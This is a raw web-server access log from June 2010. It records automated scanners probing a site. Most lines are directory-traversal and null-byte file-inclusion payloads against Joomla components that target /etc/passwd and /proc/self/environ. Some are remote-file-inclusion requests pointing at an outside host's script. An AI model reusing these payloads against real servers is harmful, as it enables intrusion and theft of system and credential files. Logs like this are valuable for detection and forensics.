69.73.166.6 - - [21/Jun/2010:00:53:39 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:40 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:42 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:43 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:44 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:45 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:47 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:48 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:48 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:49 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:50 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:51 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:00:53:51 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:53:51 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:53:52 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:00:53:52 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:00:53:52 -0400] "GET /logs/access_log.Q110060400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:00:53:53 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:54 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:55 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:56 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:57 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:58 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:59 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:00 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:00 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:01 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:02 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:03 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:04 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:05 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:07 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:00:54:07 -0400] "GET /logs/access_log.Q110060700//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:00:54:08 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
188.72.70.56 - - [21/Jun/2010:00:54:08 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:54:08 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:54:08 -0400] "GET /logs/access_log.Q110060400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
69.73.166.6 - - [21/Jun/2010:00:54:09 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:10 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:11 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:12 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:54:13 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.832"
62.44.82.118 - - [21/Jun/2010:00:54:57 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:00:54:58 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.44.82.118 - - [21/Jun/2010:00:54:58 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
95.156.233.139 - - [21/Jun/2010:00:55:12 -0400] "GET /logs/access_log.Q110061500//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 238 "-" "libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:00:55:13 -0400] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 211 "-" "libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:00:55:13 -0400] "GET /logs//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 216 "-" "libwww-perl/5.813"
95.156.233.139 - - [21/Jun/2010:00:56:00 -0400] "GET /logs/access_log.Q110053000//jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 238 "-" "libwww-perl/5.813"
188.72.70.56 - - [21/Jun/2010:00:56:27 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:56:28 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:56:28 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:05 -0400] "GET /logs/access_log.Q110053000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:05 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:05 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:09 -0400] "GET /logs/access_log.Q110053000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:09 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:10 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
209.116.59.107 - - [21/Jun/2010:00:57:45 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:00:57:45 -0400] "GET /logs/access_log.Q109122800//appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:00:57:45 -0400] "GET //appserv/main.php?appserv_root=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
188.72.70.56 - - [21/Jun/2010:00:57:49 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:49 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:50 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:53 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:54 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:54 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:55 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:55 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:57:59 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
124.38.187.59 - - [21/Jun/2010:00:58:00 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:58:12 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:12 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:13 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:16 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:19 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:19 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:20 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
209.59.12.99 - - [21/Jun/2010:00:58:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.118.123 - - [21/Jun/2010:00:58:26 -0400] "GET /logs/access_log.Q109051600/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:58:35 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:35 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:36 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:37 -0400] "GET /logs/access_log.Q110053000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:39 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:39 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:40 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:45 -0400] "GET /logs/access_log.Q110053000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:45 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:58:46 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:26 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:28 -0400] "GET /logs/error_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:29 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:29 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:36 -0400] "GET /logs/error_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:37 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:37 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:41 -0400] "GET /logs/error_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:42 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:42 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:56 -0400] "GET /logs/error_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:56 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:59:56 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:20 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:22 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:26 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:39 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:41 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:01:00:42 -0400] "GET /logs/access_log.Q110052800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
95.108.245.251 - - [21/Jun/2010:01:00:32 -0400] "GET /logs/access_log.Q109061600 HTTP/1.1" 200 5728303 "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.206 - - [21/Jun/2010:01:01:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC537236E00066B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.73.166.6 - - [21/Jun/2010:01:01:29 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:30 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
209.116.59.107 - - [21/Jun/2010:01:01:30 -0400] "GET //bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:01:30 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:01:30 -0400] "GET /logs/error_log.Q109101800%20%20//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:01:31 -0400] "GET //bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.73.166.6 - - [21/Jun/2010:01:01:31 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
209.116.59.107 - - [21/Jun/2010:01:01:31 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.116.59.107 - - [21/Jun/2010:01:01:31 -0400] "GET /logs/access_log.Q109070100//bookmark4u/lostpasswd.php?env[incude_prefix]=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
69.73.166.6 - - [21/Jun/2010:01:01:32 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:33 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:34 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:35 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:36 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:37 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:38 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:39 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:01:01:40 -0400] "GET /logs/error_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.832"
